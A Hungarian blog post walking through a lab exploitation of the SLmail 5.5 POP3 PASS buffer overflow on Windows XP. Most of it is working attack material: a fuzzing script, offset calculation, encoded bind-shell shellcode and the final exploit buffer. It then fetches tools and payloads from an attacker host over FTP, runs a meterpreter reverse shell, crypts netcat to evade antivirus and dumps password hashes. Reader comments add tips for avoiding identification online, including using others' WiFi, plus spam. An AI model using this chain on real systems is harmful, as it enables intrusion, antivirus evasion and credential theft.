2014. január 23., csütörtök

SLmail exploit


1st step download this : http://www.offensive-security.com/pwbonline/extrabos.tar.gz
2nd step : install the slmail application to XP machine

netstat -naob

 Protokoll  Helyi cím              Idegen cím             Állapot           PID
  TCP    0.0.0.0:25             0.0.0.0:0              FIGYEL          1944
  [slsmtp.exe]

  TCP    0.0.0.0:79             0.0.0.0:0              FIGYEL          2376
  [SLmail.exe]

  TCP    0.0.0.0:106            0.0.0.0:0              FIGYEL          2376
  [SLmail.exe]

  TCP    0.0.0.0:110            0.0.0.0:0              FIGYEL          2376
  [SLmail.exe]

...

  TCP    0.0.0.0:180            0.0.0.0:0              FIGYEL          1840
  [SLadmin.exe]
...
  TCP    127.0.0.1:8376         0.0.0.0:0              FIGYEL          2376
  [SLmail.exe]
...
  UDP    0.0.0.0:50             *:*                                    2376
  [SLmail.exe]

  UDP    0.0.0.0:54             *:*                                    2376
  [SLmail.exe]
...

root@kali:~# unicornscan -mT 192.168.56.105
TCP open                smtp[   25]        from 192.168.56.105  ttl 128
TCP open              finger[   79]        from 192.168.56.105  ttl 128
TCP open          3com-tsmux[  106]        from 192.168.56.105  ttl 128
TCP open                pop3[  110]        from 192.168.56.105  ttl 128
TCP open               epmap[  135]        from 192.168.56.105  ttl 128
TCP open         netbios-ssn[  139]        from 192.168.56.105  ttl 128
TCP open        microsoft-ds[  445]        from 192.168.56.105  ttl 128
TCP open             unknown[ 8081]        from 192.168.56.105  ttl 128

root@kali:~# nmap -sV -A 192.168.56.105 -pT:25,79,106,110,180

25/tcp  open  smtp    SLmail smtpd 5.5.0.4433
| smtp-commands: xxxxx-30298B2AD.com, SIZE 100000000, SEND, SOML, SAML, HELP, VRFY, EXPN, ETRN, XTRN,
|_ This server supports the following commands. HELO MAIL RCPT DATA RSET SEND SOML SAML HELP NOOP QUIT
79/tcp  open  finger  SLMail fingerd
|_finger: Finger online user list request denied.
106/tcp open  pop3pw  SLMail pop3pw
110/tcp open  pop3    BVRP Software SLMAIL pop3d
180/tcp open  ris?

root@kali:~# nc 192.168.56.105 25
220 xxxxx-30298B2AD.com SMTP Server SLmail 5.5.0.4433 Ready ESMTP spoken here
HELO my
250 xxxxx-30298B2AD.com
HELP
214-This server supports the following commands.
214-HELO    MAIL    RCPT    DATA    RSET
214-SEND    SOML    SAML    HELP    NOOP
214 QUIT
QUIT
221 xxxxx-30298B2AD.com Service closing transmission channel

root@kali:~# nc 192.168.56.105 79
?
Unable to find specified user.

root@kali:~# nc 192.168.56.105 106
200 hello
help
500 protocol error
?
500 protocol error
quit
200 bye

root@kali:~# nc 192.168.56.105 110
+OK POP3 server xxxxx-30298B2AD.com ready <00005.988109@xxxxx-30298B2AD.com>
HELP
-ERR unknown command
?
-ERR unknown command
QUIT
+OK POP3 server xxxxx-30298B2AD.com signing off.

root@kali:~# nc 192.168.56.105 180
?
HELP
QUIT
^C

http://www.exploit-db.com/exploits/638/

root@kali:~# searchsploit slmail
 Description                                                                 Path
--------------------------------------------------------------------------- -------------------------
SLMail 5.5 POP3 PASS Buffer Overflow Exploit                                /windows/remote/638.py
SLMAIL 5.5 POP3 PASS - Remote Buffer Overflow Exploit                       /windows/remote/643.c
SLMail 5.5 - Remote Buffer Overflow Exploit                                 /windows/remote/646.c

root@kali:~# cat slmail_buf.py
import sys
import struct
import socket
from time import sleep

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

buffer = 'A'*2000
s.connect((sys.argv[1],int(sys.argv[2])))
data=s.recv(1024)
print data
s.send('USER user\r\n')
data=s.recv(1024)
print data
s.send('PASS '+buffer+'\r\n')
data=s.recv(1024)
print data
s.close()

ollydbg Attach SLMAIL.exe
root@kali:~# python slmail_buf.py 192.168.56.105 110
+OK POP3 server xxxxx-30298B2AD.com ready <00006.1554953@xxxxx-30298B2AD.com>

+OK user welcome here

-ERR unable to lock mailbox

buffer = 'A'*5000

root@kali:~# python slmail_buf.py 192.168.56.105 110
+OK POP3 server xxxxx-30298B2AD.com ready <00007.1647656@xxxxx-30298B2AD.com>

+OK user welcome here

^CTraceback (most recent call last):
  File "slmail_buf.py", line 16, in <module>
    data=s.recv(1024)
KeyboardInterrupt

ESP 01BFA154 ASCII "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
EBP 41414141
EIP 41414141

root@kali:~# /usr/share/metasploit-framework/tools/pattern_create.rb 5000
Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3A...

buffer = 'Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa...

root@kali:~# python slmail_buf.py 192.168.56.105 110

ESP 01BFA154 ASCII "2Fz3Fz4Fz5Fz6Fz7Fz8Fz9Ga0Ga1Ga2Ga3Ga4Ga5Ga6Ga7Ga8Ga9Gb0Gb1Gb2Gb3Gb4Gb5Gb6Gb7Gb8Gb9Gc0Gc1Gc2Gc3Gc4Gc5Gc6Gc7Gc8Gc9Gd0Gd1Gd2Gd3Gd4Gd5Gd6Gd7Gd8Gd9Ge0Ge1Ge2Ge3Ge4Ge5Ge6Ge7Ge8Ge9Gf0Gf1Gf2Gf3Gf4Gf5Gf6Gf7Gf8Gf9Gg0Gg1Gg2Gg3Gg4Gg5Gg6Gg7Gg8Gg9Gh
EBP 46307A46
EIP 7A46317A

root@kali:~# /usr/share/metasploit-framework/tools/pattern_offset.rb 7A46317A
[*] Exact match at offset 4654

root@kali:~# /usr/share/metasploit-framework/tools/pattern_offset.rb 2Fz3
[*] Exact match at offset 4658

ollydbg Search JMP ESP

7C91FCD8   FFE4             JMP ESP

root@kali:~# msfpayload  windows/shell_bind_tcp RPORT=4444 R | msfencode -a x86 -b '\x00\x0a\x0d' -t python
[*] x86/shikata_ga_nai succeeded with size 368 (iteration=1)

buf =  ""
buf += "\xdb\xd2\xb8\xb3\xb6\xb4\xe1\xd9\x74\x24\xf4\x5f\x2b"
buf += "\xc9\xb1\x56\x31\x47\x18\x03\x47\x18\x83\xc7\xb7\x54"
buf += "\x41\x1d\x5f\x11\xaa\xde\x9f\x42\x22\x3b\xae\x50\x50"
...
buffer = '\x41' * 4654 + '\xD8\xFC\x91\x7C' + '\x90'*32 + buf

root@kali:~# python slmail_buf.py 192.168.56.105 110
+OK POP3 server xxxxx-30298B2AD.com ready <00001.6738453@xxxxx-30298B2AD.com>

+OK user welcome here

root@kali:~# nc 192.168.56.105 4444
Microsoft Windows XP [verzi&#65533;sz&#65533;m: 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\Program Files\SLmailSystem>

Next Step : Bypass the AV & privilege escalation.

C:\Program Files\SLmail\System>tftp -i 192.168.56.101 GET nc.exe
tftp -i 192.168.56.101 GET nc.exe
A hozz�f�r�s megtagadva.

AV log:

2014.01.24.    09:46:38    Blocked by Access Protection rule     NT AUTHORITY\SYSTEM    C:\WINDOWS\system32\cmd.exe    C:\WINDOWS\system32\tftp.exe    Anti-virus Standard Protection:Prevent use of tftp.exe    Action blocked : Read

C:\Program Files\SLmail\System>echo open 192.168.56.101 21> ftp.txt
echo open 192.168.56.101 21> ftp.txt

C:\Program Files\SLmail\System>echo ftp>>ftp.txt
echo ftp>>ftp.txt

C:\Program Files\SLmail\System>echo ftp>>ftp.txt
echo ftp>>ftp.txt

C:\Program Files\SLmail\System>echo bin>>ftp.txt
echo bin>>ftp.txt

C:\Program Files\SLmail\System>echo GET nc.exe>>ftp.txt
echo GET nc.exe>>ftp.txt

C:\Program Files\SLmail\System>echo bye>>ftp.txt
echo bye>>ftp.txt

C:\Program Files\SLmail\System>ftp -s:ftp.txt
ftp -s:ftp.txt
Felhaszn�l� (192.168.56.101:(none)): open 192.168.56.101 21

bin
GET nc.exe
bye

C:\Program Files\SLmail\System>dir
dir
 A meghajt�ban (C) l�v� k�tet xp_system.
 A k�tet sorozatsz�ma: 6C1F-E27C

 C:\Program Files\SLmail\System tartalma:

2014.01.24.  09:48    <DIR>          .
2014.01.24.  09:48    <DIR>          ..
2014.01.24.  09:47                56 ftp.txt
2002.11.19.  11:40             3�358 listrcrd.txt
2014.01.23.  09:24             1�898 maillog.000
2014.01.24.  00:00            51�104 maillog.001
2014.01.24.  09:33             6�141 maillog.txt
               5 f�jl            62�557 b�jt
               2 k�nyvt�r  30�726�782�976 b�jt szabad

C:\Program Files\SLmail\System>

AV log:

2014.01.24.    9:48:12    Deleted     NT AUTHORITY\SYSTEM    C:\WINDOWS\system32\ftp.exe    C:\Program Files\SLmail\System\nc.exe    Tool-NetCat (Potentially Unwanted Program)

Generate a payload16.exe with Veil.

C:\Program Files\SLmail\System>echo open 192.168.56.101 21>ftp.txt
echo open 192.168.56.101 21>ftp.txt

C:\Program Files\SLmail\System>echo ftp>>ftp.txt
echo ftp>>ftp.txt

C:\Program Files\SLmail\System>echo ftp>>ftp.txt
echo ftp>>ftp.txt

C:\Program Files\SLmail\System>echo bin>>ftp.txt
echo bin>>ftp.txt

C:\Program Files\SLmail\System>echo GET payload16.exe>>ftp.txt
echo GET payload16.exe>>ftp.txt

C:\Program Files\SLmail\System>echo bye>>ftp.txt
echo bye>>ftp.txt

C:\Program Files\SLmail\System>ftp -s:ftp.txt
ftp -s:ftp.txt
Felhaszn�l� (192.168.56.101:(none)): open 192.168.56.101 21


bin
GET payload16.exe
bye

C:\Program Files\SLmail\System>dir
dir
 A meghajt�ban (C) l�v� k�tet xp_system.
 A k�tet sorozatsz�ma: 6C1F-E27C

 C:\Program Files\SLmail\System tartalma:

2014.01.24.  10:27    <DIR>          .
2014.01.24.  10:27    <DIR>          ..
2014.01.24.  10:27                63 ftp.txt
2002.11.19.  11:40             3�358 listrcrd.txt
2014.01.23.  09:24             1�898 maillog.000
2014.01.24.  00:00            51�104 maillog.001
2014.01.24.  10:03             6�309 maillog.txt
2014.01.24.  10:27         3�059�256 payload16.exe
               6 f�jl         3�121�988 b�jt
               2 k�nyvt�r  30�723�756�032 b�jt szabad

C:\Program Files\SLmail\System>

msf > use exploit/multi/handler
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 192.168.56.101
LHOST => 192.168.56.101
msf exploit(handler) > set LPORT 443
LPORT => 443
msf exploit(handler) > set ExitOnSession false
ExitOnSession => false
msf exploit(handler) > exploit -j -z
[*] Exploit running as background job.

[*] Started reverse handler on 192.168.56.101:443
[*] Starting the payload handler...

C:\Program Files\SLmail\System>payload16.exe
payload16.exe

msf exploit(handler) >
[*] Sending stage (770048 bytes) to 192.168.56.105
[*] Meterpreter session 1 opened (192.168.56.101:443 -> 192.168.56.105:3089) at 2014-01-24 10:56:18 +0100

sessions -l

Active sessions
===============

  Id  Type                   Information                            Connection
  --  ----                   -----------                            ----------
  1   meterpreter x86/win32  NT AUTHORITY\SYSTEM @ xxxxx-30298B2AD  192.168.56.101:443 -> 192.168.56.105:3089 (192.168.56.105)

msf exploit(handler) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > sysinfo
Computer        : xxxxx-30298B2AD
OS              : Windows XP (Build 2600, Szervizcsomag 3).
Architecture    : x86
System Language : hu_HU
Meterpreter     : x86/win32
meterpreter >

meterpreter > ps

Process List
============

 PID   PPID  Name                  Arch  Session     User                                                                                                      Path
 ---   ----  ----                  ----  -------     ----                                                                                                      ----
 0     0     [System Process]            4294967295                                                                                                           
 4     0     System                x86   0           NT AUTHORITY\SYSTEM                                                                                      
 188   2012  explorer.exe          x86   0           xxxxx-30298B2AD\Admin                                                                                     C:\WINDOWS\Explorer.EXE
 300   1600  cmd.exe               x86   0           NT AUTHORITY\SYSTEM                                                                                       C:\WINDOWS\system32\cmd.exe
...

 532   848   FrameworkService.exe  x86   0           NT AUTHORITY\SYSTEM                                                                                       C:\Program Files\McAfee\Common Framework\FrameworkService.exe
 580   848   VsTskMgr.exe          x86   0           NT AUTHORITY\SYSTEM                                                                                       C:\Program Files\McAfee\VirusScan Enterprise\VsTskMgr.exe
 644   2476  McTray.exe            x86   0           xxxxx-30298B2AD\Admin                                                                                     C:\Program Files\McAfee\Common Framework\McTray.exe
 712   644   shstat.exe            x86   0           xxxxx-30298B2AD\Admin                                                                                     C:\Program Files\McAfee\VirusScan Enterprise\SHSTAT.EXE
 744   848   mdm.exe               x86   0           NT AUTHORITY\SYSTEM                                                                                       C:\Program Files\Common Files\Microsoft Shared\VS7Debug\mdm.exe
 752   580   mfeann.exe            x86   0           NT AUTHORITY\SYSTEM                                                                                       C:\Program Files\McAfee\VirusScan Enterprise\mfeann.exe
...
                                                                           C:\WINDOWS\system32\mfevtps.exe
 976   3676  payload16.exe         x86   0           NT AUTHORITY\SYSTEM                                                                                       C:\Program Files\SLmail\System\payload16.exe
...

 1840  848   SLadmin.exe           x86   0           NT AUTHORITY\SYSTEM                                                                                       C:\Program Files\SLadmin\SLadmin.exe
 1944  848   SLSmtp.exe            x86   0           NT AUTHORITY\SYSTEM                                                                                       C:\Program Files\SLmail\slsmtp.exe
...

 2100  300   nc.exe                x86   0           NT AUTHORITY\SYSTEM                                                                                       C:\Program Files\SLmail\System\nc.exe
 2136  848   mcshield.exe          x86   0           NT AUTHORITY\SYSTEM                                                                                       C:\Program Files\Common Files\McAfee\SystemCore\mcshield.exe

meterpreter >

I encrypted the nc.exe too.... :

root@kali:~/Hyperion-1.0# wine crypter.exe nc.exe nc_crypt.exe

Opening nc.exe
Copied file to memory: 0x117358
Found valid MZ signature
Found pointer to PE Header: 0xd8
Found valid PE signature
Found a PE32 file
Number of Data Directories: 16
Image Base: 0x400000

...

Starting FASM with the following parameters:
Commandline: Fasm\FASM.EXE Src\FasmContainer32\main.asm nc_crypt.exe
FASM Working Directory: Z:\root\Hyperion-1.0

Executing fasm.exe

The AV bypassed...

meterpreter > getsystem
...got system (via technique 1).
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > hashdump
Admin:1022:xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx:xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx:::
ASPNET:1004:275b6f5ffbf7997723474a13bebfa08d:738da873863e137c2e75504e6a8b4ca5:::
Rendszergazda:1005:aad3b435b51404eeaad3b435b51404ee:6f3961367d2b4d1f55f14af59f34cd45:::
Seg�ts�gny�jt�:1021:b3c85a07a2fc61530574f646d69db64a:2e82f56f50cfaa7347b018126bcad628:::
SUPPORT_388945a0:1002:aad3b435b51404eeaad3b435b51404ee:bf0859717440c82b18e3f5cb36db8211:::
user:1023:44efce164ab921caaad3b435b51404ee:32ed87bdb5fdc5e9cba88547376818d4:::
Vend�g:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
meterpreter >

Game OVER.

6 megjegyzés:

  1. Szia! Nagyon szuper blog!

    Privátban szeretnék tőled egy kis segítséget kérni C# programozásban. :-)

    email:jack-spaero[@]freemail.hu

    VálaszTörlés
  2. Ezzel vége a TOR-nak:

    http://pcforum.hu/hirek/15785/Megszerezte+az+FBI+az+osszes+a+Tor-on+keresztul+elkuldott+levelet.html

    http://pcforum.hu/hirek/15313/Konnyuszerrel+azonosithatok+a+Tor-t+hasznalo+internetezok.html

    VálaszTörlés
  3. 1. Ip cím elrejtésére a TOR mellett számos más lehetőség van.

    2. nyilvános Net kávézó vagy publikus WiFi , esetleg eldobható mobile stick + TOR és ... sok sikert a beazonosítási kísérletekhez...

    3. anomym email küldésre vannak más szolgáltatások amiket direkt erre hoztak létre...

    4. TOR-t általában azért használ valaki, hogy : a FORRÁS oldalon rejtse a forgalmat. A CÉL oldalon történő rejtőzéshez vannak ettől jobb módszerek.

    Magyarul a TOR arra való, hogy az ISP-d le lássa, hogy mit csinálsz milyen oldalakat látogatsz, stb. A private VPN-ek is erre valók. Ahhoz, hogy a cél oldalon ne lehessen lenyomozni a forrást, nem a TOR a legjobb, hanem az ellenőrizhetetlen forrás-ok alkalmazása (nyilvános wifi-k használata, kocsmák wifi jelszavának megszerzése, anonym proxy-kkal való kombinálása, satöbbi...)

    VálaszTörlés
  4. If you need your ex-girlfriend or ex-boyfriend to come crawling back to you on their knees (even if they're dating somebody else now) you need to watch this video
    right away...

    (VIDEO) Win your ex back with TEXT messages?

    VálaszTörlés
  5. I've used AVG anti virus for a couple of years now, and I recommend this anti virus to all you.

    VálaszTörlés
  6. BlueHost is ultimately the best web-hosting company for any hosting services you might need.

    VálaszTörlés